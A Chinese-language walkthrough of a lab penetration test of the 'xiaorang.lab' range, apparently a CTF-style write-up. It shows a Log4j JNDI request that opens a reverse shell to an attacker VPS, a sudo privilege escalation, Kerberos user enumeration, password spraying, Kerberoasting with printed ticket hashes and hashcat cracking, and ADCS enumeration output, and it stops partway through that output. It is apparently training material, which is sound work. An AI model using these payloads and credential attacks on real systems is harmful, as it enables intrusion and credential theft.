Certify Writeup

外网信息收集

访问后是Solr

Solr可能存在log4j2 Rce

log4j2 Rce

先起一个ldap服务

1
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsaddress -p port

反弹shell

1
2
3
4
5
6
7
8
GET /solr/admin/collections?action=${jndi:ldap://vpsaddress:1389/Basic/ReverseShell/vpsaddress/port} HTTP/1.1
Host: 39.99.154.173:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

grc提权

1
sudo grc

内网渗透

内网信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
solr@ubuntu:/tmp$ ./fscan -h  172.22.9.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-03-11 13:20:43] [INFO] 暴力破解线程数: 1
[2025-03-11 13:20:43] [INFO] 开始信息扫描
[2025-03-11 13:20:43] [INFO] CIDR范围: 172.22.9.0-172.22.9.255
[2025-03-11 13:20:43] [INFO] 生成IP范围: 172.22.9.0.%!d(string=172.22.9.255) - %!s(MISSING).%!d(MISSING)
[2025-03-11 13:20:43] [INFO] 解析CIDR 172.22.9.1/24 -> IP范围 172.22.9.0-172.22.9.255
[2025-03-11 13:20:43] [INFO] 最终有效主机数量: 256
[2025-03-11 13:20:43] [INFO] 开始主机扫描
[2025-03-11 13:20:43] [INFO] 正在尝试无监听ICMP探测...
[2025-03-11 13:20:43] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-11 13:20:43] [INFO] 切换为PING方式探测...
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.7 存活 (ICMP)
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.26 存活 (ICMP)
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.47 存活 (ICMP)
[2025-03-11 13:20:43] [SUCCESS] 目标 172.22.9.19 存活 (ICMP)
[2025-03-11 13:20:49] [INFO] 存活主机数量: 4
[2025-03-11 13:20:49] [INFO] 有效端口数量: 233
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.19:80
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.19:22
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.26:135
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:135
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:22
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:21
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:80
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:88
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:445
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.26:445
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:445
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:389
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.26:139
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.47:139
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:139
[2025-03-11 13:20:49] [SUCCESS] 端口开放 172.22.9.7:80
[2025-03-11 13:20:49] [SUCCESS] 服务识别 172.22.9.19:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-11 13:20:50] [SUCCESS] 服务识别 172.22.9.47:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-03-11 13:20:50] [SUCCESS] 服务识别 172.22.9.47:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-11 13:20:50] [SUCCESS] 端口开放 172.22.9.19:8983
[2025-03-11 13:20:54] [SUCCESS] 服务识别 172.22.9.19:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:88 =>
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.26:445 =>
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.47:80 => [http]
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:445 =>
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:389 =>
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.26:139 => Banner:[.]
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:139 => Banner:[.]
[2025-03-11 13:20:55] [SUCCESS] 服务识别 172.22.9.7:80 => [http]
[2025-03-11 13:21:00] [SUCCESS] 服务识别 172.22.9.19:8983 => [http] 产品:Apache Solr Banner:[HTTP/1.1 302 Found.Location: http://172.22.9.19:8983/solr/.]
[2025-03-11 13:21:50] [SUCCESS] 服务识别 172.22.9.47:445 =>
[2025-03-11 13:21:50] [SUCCESS] 服务识别 172.22.9.47:139 =>
[2025-03-11 13:21:54] [SUCCESS] 服务识别 172.22.9.26:135 =>
[2025-03-11 13:21:54] [SUCCESS] 服务识别 172.22.9.7:135 =>
[2025-03-11 13:21:55] [INFO] 存活端口数量: 17
[2025-03-11 13:21:55] [INFO] 开始漏洞扫描
[2025-03-11 13:21:55] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.19 状态码:200 长度:612 标题:Welcome to nginx!
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.47 状态码:200 长度:10918 标题:Apache2 Ubuntu Default Page: It works
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.7 状态码:200 长度:703 标题:IIS Windows Server
[2025-03-11 13:21:55] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
IPv4地址:
└─ 172.22.9.7
[2025-03-11 13:21:55] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
IPv4地址:
└─ 172.22.9.26
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-03-11 13:21:55] [INFO] 系统信息 172.22.9.47 [Windows 6.1]
[2025-03-11 13:21:55] [SUCCESS] NetBios 172.22.9.47 fileserver Windows 6.1
[2025-03-11 13:21:55] [SUCCESS] SMB认证成功 172.22.9.47:445 administrator:123456
[2025-03-11 13:21:55] [INFO] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[2025-03-11 13:21:55] [SUCCESS] 目标: http://172.22.9.7:80
漏洞类型: poc-yaml-active-directory-certsrv-detect
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-03-11 13:21:55] [SUCCESS] 网站标题 http://172.22.9.19:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.9.19:8983/solr/
[2025-03-11 13:21:56] [SUCCESS] 网站标题 http://172.22.9.19:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin

SMB匿名登录

此时发现存在SMB匿名登录: SMB认证成功 172.22.9.47:445 administrator:123456

flag01

存在数据库敏感信息泄露

下载下来之后发现存在类似于:xxxx@xiaorang.lab的信息

Kerberos AS-REQ 域内用户名枚举攻击

看到 @xiaorang.lab 的结尾很容易想到可能要去枚举域内用户。

在kerberos的AS-REQ认证阶段,当cname值中的用户不存在时,返回包会提示KDC_ERR_C_PRINCIPAL_UNKNOWN。当用户名存在,密码正确和密码错误时,返回包会有所不同。所以当我们没有域凭证时,我们可以基于该差异对域用户进行用户枚举。

1
./kerbrute_linux_amd64 userenum --dc 172.22.9.7 -d xiaorang.lab 1.txt

此时还发现了一张密码表

密码喷洒

1
2
3
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt i9XDE02pLVf
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt 6N70jt2K9sV
./kerbrute_linux_amd64 passwordspray --dc 172.22.9.7 -d xiaorang.lab user.txt fiAzGwEMgTY

但是无法 RDP 上去,上面提示我们 SPN,那我们就找一找 SPN。

SPN:ServicePrincipal Names

SPN,ServicePrincipal Names,即服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)在使用 Kerberos 身份验证的网络上的唯一标识符,其由服务类、主机名和端口组成。
SPN 分为两种类型:一种是注册在活动目录的机器帐户(Computers)下。当一个服务的权限为 Local System 或 Network Service 时,则 SPN 注册在机器帐户(Computers)下。另一种是注册在活动目录的域用户帐户(Users)下,当一个服务的权限为一个域用户时,则 SPN 注册在域用户帐户(Users)下。

GetUserSPNs.py 来发现注册在指定用户下的 SPN 服务主体名称

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>




┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request-user chenchen
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>



[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$65c2333af3fa46c6bd1b0de8ca6ce5b4$6d1da03f247de97817473d511822253c801b5e9592ac21ebaf452d39e9c0b178285672ccb3d988f88d54cc9cd681f6d4b8f2f81873f4b036cbdf2fc845633b1e7eeb648c775e58b2c6443e663495c51b919241668ac33ac88b92edc157845b9e0a99d41bbb24587fac446b79a5abec608d65266377d4e1710276b0fcffe5bc1b33f2788006a6848f79c47074a20626c7657ad4aa2fa140ee04e6d5ce30e8e70a3a47e882cdd2c3e94ff1f6385687f4c4525ce0d9506ba02518ccc500b03a26c40047154126d9e18dfe71a470df9c7adb233268c987a0a438eb9a513b952d373e13f4bcd8d96fe7da1f35ee1203d429d59e12cdb51b304aab3b92c34aed8fc88a0ae3593fa4a259256405212339ac6da100c1b85f13fa9ee6846a47237cd3f4e716f17e07903032cc6d7aa99b0d44d08d07c484d55b4b5be16aeada476e43905126923f54b5bf4765aad5cd0ecd17458a714f7d72cc96922f5398e3023cb8a12e13012466b1f40035114588f1eff59321581e8b3de82648886f607a3502f0dba1c406cba6cb9785cf862529ff5a3c1b92fd9a2b8ee2fbd9af6bc0799d597444c740bb550f222797b25ec417b9c1a0823d2297a3eb61a7ff9d92f0a801027bf1ebae97b7e1ea3b8f4ab6c60afb34dfb0f92f286bb4ea2de25e2e5aad0662271cf8e7c11a6fceb67a47462b8de8df5f361c461e891f893feaa4698f5e470f2735eb3b32da3ac925bf29d3cc52f07399d25b70c1cb87ae5a96374ed62ca3b4b1968b9d78d8b9f8ee0333867f0b82a8c016ef3933332eccfab23826d43a93951815697a3b3b6fd93fe7fda0ebe686f1f0a03703250abb462f7007ae3e731e1762def90f20ec0539d4f3082419d1f2550bbe978a52d231c10e72a599d12422921da7ed5c6a3c289a22132f5db23a1e3a79832f026d446aae6fb40d5124fa2ee7a1ab16d8ab35f9ada1fad0c4ff75c5876df2f8f8e2f031538e53934ad5a0de18df01c76436733671c384cb710b3100eff8057f7130ef1174e2da8b9589076fd6bf2528f028dcd19e7a25347c3cd6d867a89f4a907ce084008745764019742257f114f100f2dc1ac3c797c04670bc4109bb71b56cdce894d9b681f342530f0a30c2c2ae1c3427d7c4039a108a7cdf8faea09ee574bbb6196be535ef4916dda2b2df6949badb44858d4a54f22dce4b29e4a02478c8f1354ea8969888129c0a57a981c1f046c81b0fcd4af82445f83509040254fce2f80a622e9e1390fbb1047d8fdd54cc0364c07110108b430757d7742272b72c6a7d996e80b69667820a17384f1eb42941e9cfff1600ad2f2e5b34581718d9bbc3fddff8f9b95ade59c65b7990aee2666957afe3d5cd31296db4ae1e39ebd79e303e758c06c524805ba19033423bdc8fa71589a528f2c8025893aee148160ea30c707aa1e1ed183bd5bc46f33ad0d79ad9b8d650a590076d358897504074a885821222b4dd7b2bcdb79a8cda0c50ab99a0958347ccd21b916912f8f9a61a

┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>




┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 12:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 12:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>




┌──(hey㉿kali)-[~/Desktop/impacket-0.12.0/examples]
└─$ proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY -request-user chenchen
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0', 'GetUserSPNs.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 12:45:39.767035 <never>



[-] CCache file is not found. Skipping...
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
[proxychains] Strict chain ... 47.122.38.153:6666 ... 172.22.9.7:88 ... OK
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$72477e422a439a3804793b75737a89ae$0780a99f3632f74fe39603751c6da681950f0cbc5f7b77a7194b582f9e6e0792ab78caf24d7439ce627ee36d8ba63f8b87f5246acbc7e08a2fdf8b3e9072c24869bd2d127693c0ceff14d2b9cc5299e8b8a7a111b4d546521fb956e3cc6142d2ddd5714e599891bf9dfc7af9d171ba4cab2c3118bea02ad73c20c3eac1078df656595174d0b2fe25ec88890d5a7720f3b3b5d0184057fb79835a3fd2cc90af2d4241965da7585a888630ae7a0939472f84f5d18dcb4b9bf0631efc17f5b135727112f3e9948e975d466db5cd59ddf49953f4158e35b64e52db8c3e3d30094850cf0b8d261806e921bcf0d98ca390671994d063608ea503cd3746fa909c9c1196f8680c0d0067cb782ff89959b5b98555abb913543ddf1b301e54bb4c85dead160db2dce0035713d1cff812d51437e8759e7e14bd968f0cccb2b34d7a58b7b8cc8b3ae8c84387e2193791c971fc0da5fb80f328feb6e6c334230e6355e233a4e4245bffabe388c3e78e5203ad8ba2671f788461f0eb13927560cba015a2cb7ab19ad55b248503fbd7e35464ab7116a7e24ab48ad0138cc74e278dd3d97f33aab46f21b47e8af9016040207fad5b5dc6b3de08ddbb3b4501924823d07ac4ccbf2a52501b3e6874681556171f5316e88526189039e91ceca92840c8099a37e728b0da2909296787433eac46c0feda03b25aeabfb29244f7abde60188a3b647f30f1bfc928dc1383024c0fa509ab2621003744ca9fb3174de8e6bbb6eb71ba74de90162ba078ed1dcc5c020869bbc3b731cf9742ce6ade3768abed3b1413287e4b8c91051e9576f46412f33a936f1599b17c3fe5054dd3c7a9865b5f68684d124fc822900f758791b203b9695cd585ca6bba93cce79fcb39f28c607ebcf47058d86d20f7261a7dee843c8a8f31c6ab39a09b96933b1e0573fbee75d80c2f3671f804a2ac149ad6c4606c05a902f4091eaa5edf26202b87fc303091500a3a98ff7e0eca60473b548584f25f596bf87367cbcd4ac09a8d31d825c690243e4c27e1b5ea0c55324e69c5e7b40882c51ad595ae2338c8f1c52e08a975e740729b880f256280db0671b8520881aa1131f80b239734b4989dfcb4b21e194705265ee988306733dfaefbde57c0cf7b3f50a95b78fad7197b9041d78e76da2aa5cf925a7b0e7ab9c0e848d308726d48183dcd3b0d96511711950de3bf2060f88f4dee0799ff6ff040e96997299edaf9f00b863f51348094dea79a2b8ccb08292863267b7cf9e0286896e2d8ca1925298f9ad06ed55c3d7fd9591b063ee00e0830ecf6ce171ea73b4d9677200454a3a8a6057e4f0457d96673934da20cbb69bf025c2f69abf411f72aba42e91b4be2cd9d5fef5ab2989781e5c7ba75b969d3b247a2fd24d2bec1a0891d2c0d344fb6d6f7f015348cf86b1f41b40917ab9ee704c1dd03a15405f5470cfb2e16611c8bea2adf52

请求ST票据

1
2
proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains GetUserSPNs.py -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf -request-user chenchen

hash爆破

1
hashcat -m 13100 -a 0 '/home/hey/Desktop/2.txt' '/home/hey/Desktop/rockyou.txt' --force

Rdp

域渗透

域内信息收集

在先前的内网信息收集中我们已经知道172.22.9.26这台机器存在active-directory-certsrv-detect;也就是ADCS:

ADCS:Active Directory Certificate Services(活动目录证书服务)。ADCS 是 Windows Server 中的一个角色,用于建立和管理公钥基础设施(PKI)。PKI 是一种用于创建、管理、分发、存储和撤销数字证书的体系结构。ADCS 允许组织在其网络中实现安全通信,通过颁发和管理数字证书来确保数据传输的机密性、完整性和身份验证。

AD CS

1
proxychains certipy find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
C:\Users\chenchen\Desktop\hvv>Certify.exe find -u 'liupeng@xiaorang.lab'  -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

Enterprise CA Name : xiaorang-XIAORANG-DC-CA
DNS Hostname : XIAORANG-DC.xiaorang.lab
FullName : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Cert Thumbprint : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
Cert Serial : 43A73F4A37050EAA4E29C0D95BC84BB5
Cert Start Date : 2023/7/14 12:33:21
Cert End Date : 2028/7/14 12:43:21
Cert Chain : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : User
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : EFS
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : 加密文件系统
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteOwner Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : Administrator
Schema Version : 1
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
